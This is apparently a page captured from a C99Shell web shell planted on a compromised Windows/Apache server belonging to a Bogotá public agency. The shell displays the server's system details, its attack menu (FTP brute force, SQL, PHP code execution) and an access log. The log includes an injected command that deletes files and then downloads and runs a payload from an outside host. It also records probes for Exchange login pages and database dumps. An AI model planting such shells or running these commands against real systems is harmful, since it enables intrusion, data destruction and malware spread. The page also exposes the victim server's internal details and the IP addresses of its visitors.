!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 5.02 GB of 239.26 GB (2.1%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.04.24.log (681.2 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
172.22.2.4 - - [23/Apr/2022:23:59:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56300
216.245.221.92 - - [24/Apr/2022:00:02:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:00:04:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:00:04:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60105
216.245.221.92 - - [24/Apr/2022:00:07:51 -0500] "HEAD / HTTP/1.1" 200 -
152.61.192.232 - - [24/Apr/2022:00:11:16 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [24/Apr/2022:00:09:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:00:10:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56300
216.245.221.92 - - [24/Apr/2022:00:12:51 -0500] "HEAD / HTTP/1.1" 200 -
152.61.128.50 - - [24/Apr/2022:00:14:43 -0500] "GET / HTTP/1.1" 200 319
98.233.50.166 - - [24/Apr/2022:00:16:20 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
98.233.50.166 - - [24/Apr/2022:00:16:20 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12171
98.233.50.166 - - [24/Apr/2022:00:16:20 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
98.233.50.166 - - [24/Apr/2022:00:16:20 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
98.233.50.166 - - [24/Apr/2022:00:16:20 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
98.233.50.166 - - [24/Apr/2022:00:16:20 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
98.233.50.166 - - [24/Apr/2022:00:16:20 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
98.233.50.166 - - [24/Apr/2022:00:16:20 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
98.233.50.166 - - [24/Apr/2022:00:16:20 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
98.233.50.166 - - [24/Apr/2022:00:16:20 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
98.233.50.166 - - [24/Apr/2022:00:16:20 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
98.233.50.166 - - [24/Apr/2022:00:16:20 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
98.233.50.166 - - [24/Apr/2022:00:16:20 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
98.233.50.166 - - [24/Apr/2022:00:16:21 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
98.233.50.166 - - [24/Apr/2022:00:16:21 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
98.233.50.166 - - [24/Apr/2022:00:16:21 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
172.22.2.4 - - [24/Apr/2022:00:15:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [24/Apr/2022:00:17:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:00:16:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56669
172.22.2.4 - - [24/Apr/2022:00:17:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
66.249.65.13 - - [24/Apr/2022:00:20:27 -0500] "-" 408 -
216.245.221.92 - - [24/Apr/2022:00:22:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:00:22:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42149
172.22.2.4 - - [24/Apr/2022:00:21:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:00:23:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45790
172.22.2.4 - - [24/Apr/2022:00:22:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
216.245.221.92 - - [24/Apr/2022:00:27:51 -0500] "HEAD / HTTP/1.1" 200 -
66.220.149.1 - - [24/Apr/2022:00:28:30 -0500] "GET /distrito-academia-y-sector-privado-plantaron-100-arboles-para-conmemorar-el-dia-de-la-tierra.html?fbclid=IwAR0eWVqGWFN7ZAmridFS3HFvqeZO2HCNFw_TW89zFJxIrbqHUU6cLGO_Tok HTTP/1.1" 200 1066
172.22.2.4 - - [24/Apr/2022:00:27:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:00:28:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [24/Apr/2022:00:32:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:00:32:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42149
207.46.13.115 - - [24/Apr/2022:00:33:06 -0500] "GET /BLA/boletinlegal/actas/079-2013.pdf HTTP/1.1" 304 -
201.245.192.253 - - [24/Apr/2022:00:33:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45790
172.22.2.4 - - [24/Apr/2022:00:33:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:00:34:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54090
172.22.2.4 - - [24/Apr/2022:00:37:18 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
181.51.34.187 - - [24/Apr/2022:00:37:20 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
181.51.34.187 - - [24/Apr/2022:00:37:28 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2008%2F HTTP/1.1" 200 569644
172.22.2.4 - - [24/Apr/2022:00:37:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.245.221.92 - - [24/Apr/2022:00:37:51 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.199 - - [24/Apr/2022:00:39:56 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2006%2FRES+2006+351-400%2F HTTP/1.1" 200 12234
157.55.39.199 - - [24/Apr/2022:00:40:14 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
172.22.2.4 - - [24/Apr/2022:00:39:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:00:39:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54457
216.245.221.92 - - [24/Apr/2022:00:42:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:00:42:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42149
201.245.192.253 - - [24/Apr/2022:00:43:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45790
172.22.2.4 - - [24/Apr/2022:00:44:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:00:45:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
216.245.221.92 - - [24/Apr/2022:00:47:51 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.145 - - [24/Apr/2022:00:49:19 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FAUTOS+2021%2F HTTP/1.1" 200 184734
207.46.13.82 - - [24/Apr/2022:00:49:22 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12493
5.234.215.90 - - [24/Apr/2022:00:49:39 -0500] "GET / HTTP/1.1" 200 319
5.234.215.90 - - [24/Apr/2022:00:49:39 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [24/Apr/2022:00:50:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.17 - - [24/Apr/2022:00:52:48 -0500] "-" 408 -
216.245.221.92 - - [24/Apr/2022:00:52:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:00:51:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
152.61.192.232 - - [24/Apr/2022:00:56:56 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [24/Apr/2022:00:56:57 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [24/Apr/2022:00:56:57 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
35.233.62.116 - - [24/Apr/2022:00:57:09 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [24/Apr/2022:00:57:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:00:56:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:00:58:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [24/Apr/2022:00:57:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56300
31.13.127.28 - - [24/Apr/2022:01:01:30 -0500] "GET /images/liberacion-fauna-silvestre-23-abril.jpg HTTP/1.1" 200 52551
31.13.127.5 - - [24/Apr/2022:01:02:08 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html?fbclid=IwAR3LuDnjintl9G9hevF_r53ycRTOS1i8ByQptXVDDprO9eGXbg0ILrRlO_A HTTP/1.1" 200 1095
152.61.128.50 - - [24/Apr/2022:01:02:48 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [24/Apr/2022:01:02:50 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [24/Apr/2022:01:02:50 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
216.245.221.92 - - [24/Apr/2022:01:02:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:01:02:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [24/Apr/2022:01:04:06 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:01:03:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
35.204.131.47 - - [24/Apr/2022:01:06:41 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [24/Apr/2022:01:07:51 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.64 - - [24/Apr/2022:01:08:13 -0500] "GET /caminos-de-los-cerros-habilitados-en-esta-semana-santa-2022.html HTTP/1.1" 200 832
172.22.2.4 - - [24/Apr/2022:01:08:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [24/Apr/2022:01:10:16 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:01:09:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [24/Apr/2022:01:12:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:01:14:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [24/Apr/2022:01:15:54 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:01:14:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [24/Apr/2022:01:17:51 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [24/Apr/2022:01:21:29 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:01:19:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:01:20:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
216.245.221.92 - - [24/Apr/2022:01:22:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:01:22:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43941
201.245.192.253 - - [24/Apr/2022:01:23:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45789
172.22.2.4 - - [24/Apr/2022:01:24:55 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [24/Apr/2022:01:24:57 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17573
172.22.2.4 - - [24/Apr/2022:01:25:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [24/Apr/2022:01:27:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:01:26:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59688
66.249.65.13 - - [24/Apr/2022:01:29:14 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:01:31:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
216.245.221.92 - - [24/Apr/2022:01:32:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:01:32:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43941
172.22.2.4 - - [24/Apr/2022:01:31:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:01:33:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45789
172.22.2.4 - - [24/Apr/2022:01:32:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49718
172.22.2.4 - - [24/Apr/2022:01:34:14 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [24/Apr/2022:01:34:15 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [24/Apr/2022:01:34:15 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [24/Apr/2022:01:34:16 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [24/Apr/2022:01:34:16 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [24/Apr/2022:01:34:16 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [24/Apr/2022:01:34:16 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [24/Apr/2022:01:34:16 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [24/Apr/2022:01:34:16 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [24/Apr/2022:01:34:16 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [24/Apr/2022:01:34:16 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
116.30.221.64 - - [24/Apr/2022:01:37:35 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
194.93.0.40 - - [24/Apr/2022:01:37:47 -0500] "-" 408 -
216.245.221.92 - - [24/Apr/2022:01:37:51 -0500] "HEAD / HTTP/1.1" 200 -
17.121.114.8 - - [24/Apr/2022:01:38:06 -0500] "-" 408 -
66.249.65.13 - - [24/Apr/2022:01:38:31 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:01:37:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:01:38:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
216.245.221.92 - - [24/Apr/2022:01:42:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:01:42:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43941
172.22.2.4 - - [24/Apr/2022:01:43:14 -0500] "GET /BLA/boletinlegal/owa/auth/x.js HTTP/1.1" 404 1018
201.245.192.253 - - [24/Apr/2022:01:43:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45789
172.22.2.4 - - [24/Apr/2022:01:44:37 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20Jurisprudencia%20Sent%202000-00005-01.doc HTTP/1.1" 304 -
172.22.2.4 - - [24/Apr/2022:01:43:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:01:44:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
172.22.2.4 - - [24/Apr/2022:01:45:50 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx HTTP/1.1" 404 1018
172.22.2.4 - - [24/Apr/2022:01:46:11 -0500] "GET /BLA/boletinlegal/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 1018
216.245.221.92 - - [24/Apr/2022:01:47:51 -0500] "HEAD / HTTP/1.1" 200 -
177.131.125.161 - - [24/Apr/2022:01:47:52 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [24/Apr/2022:01:47:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [24/Apr/2022:01:49:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:01:49:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [24/Apr/2022:01:52:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:01:54:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:01:55:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
216.245.221.92 - - [24/Apr/2022:01:57:51 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.82 - - [24/Apr/2022:02:02:20 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12493
172.22.2.4 - - [24/Apr/2022:02:00:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [24/Apr/2022:02:02:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:02:01:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
66.249.65.13 - - [24/Apr/2022:02:07:46 -0500] "-" 408 -
216.245.221.92 - - [24/Apr/2022:02:07:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:02:06:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:02:08:58 -0500] "GET /BLA/boletinlegal/doctrina/sin1pecrew.html HTTP/1.1" 404 1038
172.22.2.4 - - [24/Apr/2022:02:07:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
199.59.150.183 - - [24/Apr/2022:02:10:27 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
216.245.221.92 - - [24/Apr/2022:02:12:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:02:12:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:02:13:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56300
172.22.2.4 - - [24/Apr/2022:02:15:08 -0500] "GET /BLA/boletinlegal/actas/079-2013.pdf HTTP/1.1" 304 -
157.55.39.211 - - [24/Apr/2022:02:16:06 -0500] "GET /portaldeninos/parque-mirador-de-los-nevados/ HTTP/1.1" 200 89788
66.249.73.135 - - [24/Apr/2022:02:16:29 -0500] "-" 408 -
66.249.65.13 - - [24/Apr/2022:02:17:46 -0500] "-" 408 -
216.245.221.92 - - [24/Apr/2022:02:17:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:02:18:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:02:19:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
173.252.127.1 - - [24/Apr/2022:02:22:11 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html?fbclid=IwAR1McBQ0XgQUT8mw8STgkLXuicydpXfCu2o3Lv2DXrmfubtg1Ysxh61OoXE HTTP/1.1" 200 1095
216.245.221.92 - - [24/Apr/2022:02:22:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:02:22:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44095
172.22.2.4 - - [24/Apr/2022:02:23:32 -0500] "GET /BLA/boletinlegal/ambientebogota.sql HTTP/1.1" 404 1025
201.245.192.253 - - [24/Apr/2022:02:23:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45787
172.22.2.4 - - [24/Apr/2022:02:24:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [24/Apr/2022:02:25:47 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:02:24:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55089
216.245.221.92 - - [24/Apr/2022:02:27:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:02:29:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [24/Apr/2022:02:32:15 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:02:30:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59688
20.36.244.102 - - [24/Apr/2022:02:32:28 -0500] "GET /noticias/rssambiente.php HTTP/1.1" 406 -
216.245.221.92 - - [24/Apr/2022:02:32:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:02:32:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44095
172.22.2.4 - - [24/Apr/2022:02:33:49 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [24/Apr/2022:02:33:49 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [24/Apr/2022:02:33:49 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [24/Apr/2022:02:33:49 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [24/Apr/2022:02:33:49 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [24/Apr/2022:02:33:49 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [24/Apr/2022:02:33:49 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [24/Apr/2022:02:33:49 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [24/Apr/2022:02:33:49 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [24/Apr/2022:02:33:49 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [24/Apr/2022:02:33:50 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [24/Apr/2022:02:33:50 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [24/Apr/2022:02:33:50 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [24/Apr/2022:02:33:50 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [24/Apr/2022:02:33:50 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [24/Apr/2022:02:33:50 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [24/Apr/2022:02:33:50 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [24/Apr/2022:02:33:50 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [24/Apr/2022:02:33:50 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
66.248.204.103 - - [24/Apr/2022:02:33:51 -0500] "GET /images/plantacion-jbb-22-abril.jpg HTTP/1.1" 200 52184
66.248.204.109 - - [24/Apr/2022:02:33:52 -0500] "GET /images/actividades-dia-tierra-22-abril.jpg HTTP/1.1" 200 77276
201.245.192.253 - - [24/Apr/2022:02:33:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45787
172.22.2.4 - - [24/Apr/2022:02:33:57 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [24/Apr/2022:02:33:57 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [24/Apr/2022:02:33:57 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [24/Apr/2022:02:33:57 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [24/Apr/2022:02:33:57 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [24/Apr/2022:02:33:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
66.248.204.32 - - [24/Apr/2022:02:34:02 -0500] "GET /images/feria-servicios-tramites-puente-aranda-21-abril.jpg HTTP/1.1" 200 28255
172.22.2.4 - - [24/Apr/2022:02:34:05 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [24/Apr/2022:02:34:19 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [24/Apr/2022:02:34:19 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [24/Apr/2022:02:34:19 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [24/Apr/2022:02:34:19 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [24/Apr/2022:02:34:19 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [24/Apr/2022:02:34:19 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [24/Apr/2022:02:34:19 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [24/Apr/2022:02:34:19 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [24/Apr/2022:02:34:19 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
